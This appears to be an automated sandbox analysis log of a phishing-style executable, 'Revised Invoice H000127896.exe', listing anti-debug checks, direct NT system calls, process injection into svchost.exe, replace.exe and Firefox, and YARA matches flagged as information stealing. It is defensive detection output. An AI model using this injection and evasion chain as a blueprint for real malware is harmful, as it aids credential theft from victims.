Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h] 2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h] 2_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h] 2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h] 2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h] 2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h] 2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h] 2_2_038BCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h] 2_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h] 2_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h] 2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h] 2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h] 2_2_0386CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h] 2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h] 2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h] 2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h] 2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h] 2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h] 2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h] 2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h] 2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h] 2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h] 2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h] 2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h] 2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h] 2_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h] 2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h] 2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h] 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h] 2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h] 2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h] 2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h] 2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h] 2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h] 2_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h] 2_2_038649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h] 2_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h] 2_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h] 2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h] 2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h] 2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h] 2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h] 2_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h] 2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h] 2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B892A mov eax, dword ptr fs:[00000030h] 2_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C892B mov eax, dword ptr fs:[00000030h] 2_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h] 2_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904940 mov eax, dword ptr fs:[00000030h] 2_2_03904940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h] 2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h] 2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h] 2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h] 2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0387096E mov edx, dword ptr fs:[00000030h] 2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h] 2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h] 2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h] 2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h] 2_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03830887 mov eax, dword ptr fs:[00000030h] 2_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h] 2_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h] 2_2_039008C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h] 2_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h] 2_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h] 2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h] 2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h] 2_2_03852835
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_004238DA
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter, 0_2_0041F250
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041A208
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417DAA

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtQuerySystemInformation: Direct from: 0x76EF48CC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtOpenSection: Direct from: 0x76EF2E0C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtQueryInformationToken: Direct from: 0x76EF2CAC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtCreateFile: Direct from: 0x76EF2FEC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtOpenFile: Direct from: 0x76EF2DCC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtTerminateThread: Direct from: 0x76EF2FCC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtOpenKeyEx: Direct from: 0x76EF2B9C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtSetInformationProcess: Direct from: 0x76EF2C5C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtCreateMutant: Direct from: 0x76EF35CC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtResumeThread: Direct from: 0x76EF36AC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtMapViewOfSection: Direct from: 0x76EF2D1C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtReadFile: Direct from: 0x76EF2ADC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtDelayExecution: Direct from: 0x76EF2DDC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtQueryInformationProcess: Direct from: 0x76EF2C26 Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtResumeThread: Direct from: 0x76EF2FBC Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtCreateUserProcess: Direct from: 0x76EF371C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtWriteVirtualMemory: Direct from: 0x76EF490C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtSetInformationThread: Direct from: 0x76EE63F9 Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtSetInformationThread: Direct from: 0x76EF2B4C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe NtCreateKey: Direct from: 0x76EF2C6C Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Thread register set: target process: 6496 Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Thread APC queued: target process: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CEE008 Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00436CD7 LogonUserW, 0_2_00436CD7
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_0043333C
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe" Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe" Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00446124
Source: MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: Revised Invoice H000127896.exe, MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: Revised Invoice H000127896.exe Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW, 0_2_004720DB
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00472C3F GetUserNameW, 0_2_00472C3F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache, 0_2_0041E364
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
